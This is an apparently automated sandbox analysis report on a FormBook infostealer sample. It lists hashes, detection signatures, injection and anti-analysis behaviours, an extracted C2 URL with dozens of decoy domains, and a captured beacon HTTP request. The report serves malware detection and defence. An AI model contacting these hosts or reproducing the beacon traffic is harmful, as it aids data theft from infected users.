Windows Analysis Report s2rsXUiUn8

Overview

General Information

Sample Name:	s2rsXUiUn8 (renamed file extension from none to exe)
Analysis ID:	452684
MD5:	f5041ec4ce468a07ecbfd076bc0f879b
SHA1:	bda8cea1ec8d1cea253fc661559cd84cee2195b9
SHA256:	caff14d450514a35eac5ba34b3e74126360662d7c8fdf60a8008a0e3bb8ed0b3
Tags:	exetrojan
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Obfuscated command line found

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Suspicious PowerShell Command Line

Tries to detect virtualization through RDTSC time measurements

Very long command line found

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}

Multi AV Scanner detection for submitted file

Source: s2rsXUiUn8.exe	Metadefender: Detection: 17%			Perma Link
Source: s2rsXUiUn8.exe	ReversingLabs: Detection: 57%

Yara detected FormBook

Source: Yara match	File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

Antivirus or Machine Learning detection for unpacked file

Source: 9.2.calc.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: unknown

HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2

Source:	Binary string: calc.pdbGCTL source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: calc.exe, 00000009.00000002.342996454.000000000349F000.00000040.00000001.sdmp, help.exe, 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp
Source:	Binary string: calc.pdb source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: calc.exe, help.exe
Source:	Binary string: help.pdbGCTL source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
Source:	Binary string: help.pdb source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\calc.exe	Code function: 4x nop then pop ebx	9_2_00407AFA
Source: C:\Windows\SysWOW64\calc.exe	Code function: 4x nop then pop edi	9_2_0040E43F
Source: C:\Windows\SysWOW64\help.exe	Code function: 4x nop then pop ebx	19_2_001A7AFB
Source: C:\Windows\SysWOW64\help.exe	Code function: 4x nop then pop edi	19_2_001AE43F

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.homekeycap.com/pjje/

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1Host: www.rajuherbalandspicegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 162.159.134.233 162.159.134.233

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

Source: unknown

DNS traffic detected: queries for: google.com

Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443

Source: unknown

HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Very long command line found

Source: C:\Users\user\Desktop\s2rsXUiUn8.exe	Process created: Commandline size = 4201
Source: C:\Users\user\Desktop\s2rsXUiUn8.exe	Process created: Commandline size = 4201			Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00419D50 NtCreateFile,	9_2_00419D50
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00419E00 NtReadFile,	9_2_00419E00
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00419E80 NtClose,	9_2_00419E80
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00419F30 NtAllocateVirtualMemory,	9_2_00419F30
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00419D4B NtCreateFile,	9_2_00419D4B
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00419DFB NtReadFile,	9_2_00419DFB
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00419E4A NtClose,	9_2_00419E4A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00419E7A NtClose,	9_2_00419E7A
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9A20 NtResumeThread,LdrInitializeThunk,	9_2_033E9A20
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9A00 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_033E9A00
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9A50 NtCreateFile,LdrInitializeThunk,	9_2_033E9A50
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_033E9910
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E99A0 NtCreateSection,LdrInitializeThunk,	9_2_033E99A0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_033E9860
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9840 NtDelayExecution,LdrInitializeThunk,	9_2_033E9840
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E98F0 NtReadVirtualMemory,LdrInitializeThunk,	9_2_033E98F0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9710 NtQueryInformationToken,LdrInitializeThunk,	9_2_033E9710
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E97A0 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_033E97A0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9780 NtMapViewOfSection,LdrInitializeThunk,	9_2_033E9780
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_033E9660
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E96E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_033E96E0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9540 NtReadFile,LdrInitializeThunk,	9_2_033E9540
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E95D0 NtClose,LdrInitializeThunk,	9_2_033E95D0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9B00 NtSetValueKey,	9_2_033E9B00
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033EA3B0 NtGetContextThread,	9_2_033EA3B0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9A10 NtQuerySection,	9_2_033E9A10
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9A80 NtOpenDirectoryObject,	9_2_033E9A80
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9950 NtQueueApcThread,	9_2_033E9950
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E99D0 NtCreateProcessEx,	9_2_033E99D0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9820 NtEnumerateKey,	9_2_033E9820
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033EB040 NtSuspendThread,	9_2_033EB040
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E98A0 NtWriteVirtualMemory,	9_2_033E98A0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9730 NtQueryVirtualMemory,	9_2_033E9730
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033EA710 NtOpenProcessToken,	9_2_033EA710
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9770 NtSetInformationFile,	9_2_033E9770
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033EA770 NtOpenThread,	9_2_033EA770
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9760 NtOpenProcess,	9_2_033E9760
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9FE0 NtCreateMutant,	9_2_033E9FE0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9610 NtEnumerateValueKey,	9_2_033E9610
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9670 NtQueryInformationProcess,	9_2_033E9670
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9650 NtQueryValueKey,	9_2_033E9650
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E96D0 NtCreateKey,	9_2_033E96D0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033EAD30 NtSetContextThread,	9_2_033EAD30
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9520 NtWaitForSingleObject,	9_2_033E9520
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E9560 NtWriteFile,	9_2_033E9560
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033E95F0 NtQueryInformationFile,	9_2_033E95F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC96E0 NtFreeVirtualMemory,LdrInitializeThunk,	19_2_02AC96E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC96D0 NtCreateKey,LdrInitializeThunk,	19_2_02AC96D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9660 NtAllocateVirtualMemory,LdrInitializeThunk,	19_2_02AC9660
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9650 NtQueryValueKey,LdrInitializeThunk,	19_2_02AC9650
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9A50 NtCreateFile,LdrInitializeThunk,	19_2_02AC9A50
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9780 NtMapViewOfSection,LdrInitializeThunk,	19_2_02AC9780
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9FE0 NtCreateMutant,LdrInitializeThunk,	19_2_02AC9FE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9710 NtQueryInformationToken,LdrInitializeThunk,	19_2_02AC9710
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9860 NtQuerySystemInformation,LdrInitializeThunk,	19_2_02AC9860
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9840 NtDelayExecution,LdrInitializeThunk,	19_2_02AC9840
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC99A0 NtCreateSection,LdrInitializeThunk,	19_2_02AC99A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC95D0 NtClose,LdrInitializeThunk,	19_2_02AC95D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	19_2_02AC9910
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9540 NtReadFile,LdrInitializeThunk,	19_2_02AC9540
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9A80 NtOpenDirectoryObject,	19_2_02AC9A80
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9A20 NtResumeThread,	19_2_02AC9A20
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9A00 NtProtectVirtualMemory,	19_2_02AC9A00
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9610 NtEnumerateValueKey,	19_2_02AC9610
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9A10 NtQuerySection,	19_2_02AC9A10
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9670 NtQueryInformationProcess,	19_2_02AC9670
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC97A0 NtUnmapViewOfSection,	19_2_02AC97A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02ACA3B0 NtGetContextThread,	19_2_02ACA3B0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9730 NtQueryVirtualMemory,	19_2_02AC9730
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9B00 NtSetValueKey,	19_2_02AC9B00
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02ACA710 NtOpenProcessToken,	19_2_02ACA710
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9760 NtOpenProcess,	19_2_02AC9760
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9770 NtSetInformationFile,	19_2_02AC9770
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02ACA770 NtOpenThread,	19_2_02ACA770
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC98A0 NtWriteVirtualMemory,	19_2_02AC98A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC98F0 NtReadVirtualMemory,	19_2_02AC98F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9820 NtEnumerateKey,	19_2_02AC9820
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02ACB040 NtSuspendThread,	19_2_02ACB040
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC95F0 NtQueryInformationFile,	19_2_02AC95F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC99D0 NtCreateProcessEx,	19_2_02AC99D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9520 NtWaitForSingleObject,	19_2_02AC9520
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02ACAD30 NtSetContextThread,	19_2_02ACAD30
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9560 NtWriteFile,	19_2_02AC9560
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AC9950 NtQueueApcThread,	19_2_02AC9950
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001B9D50 NtCreateFile,	19_2_001B9D50
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001B9E00 NtReadFile,	19_2_001B9E00
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001B9E80 NtClose,	19_2_001B9E80
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001B9F30 NtAllocateVirtualMemory,	19_2_001B9F30
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001B9D4B NtCreateFile,	19_2_001B9D4B
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001B9DFB NtReadFile,	19_2_001B9DFB
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001B9E4A NtClose,	19_2_001B9E4A
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_001B9E7A NtClose,	19_2_001B9E7A

Detected potential crypto function

Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041D84E	9_2_0041D84E
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041E066	9_2_0041E066
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041E94D	9_2_0041E94D
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041D1F1	9_2_0041D1F1
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041DA23	9_2_0041DA23
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041DB36	9_2_0041DB36
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00402D89	9_2_00402D89
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_0041BE22	9_2_0041BE22
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00409E30	9_2_00409E30
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_03472B28	9_2_03472B28
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033DEBB0	9_2_033DEBB0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_034722AE	9_2_034722AE
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033C4120	9_2_033C4120
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033AF900	9_2_033AF900
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_03461002	9_2_03461002
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033D20A0	9_2_033D20A0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033BB090	9_2_033BB090
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_034720A8	9_2_034720A8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_03471FF1	9_2_03471FF1
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033C6E30	9_2_033C6E30
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_03472EF7	9_2_03472EF7
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_03471D55	9_2_03471D55
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033A0D20	9_2_033A0D20
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_03472D07	9_2_03472D07
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033D2581	9_2_033D2581
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033BD5E0	9_2_033BD5E0
Source: C:\Windows\SysWOW64\calc.exe	Code function: 9_2_033B841F	9_2_033B841F
Source: C:\Windows\SysWOW64\help.exe	Code function: 19_2_02AA6E30	19_2_02AA6E30
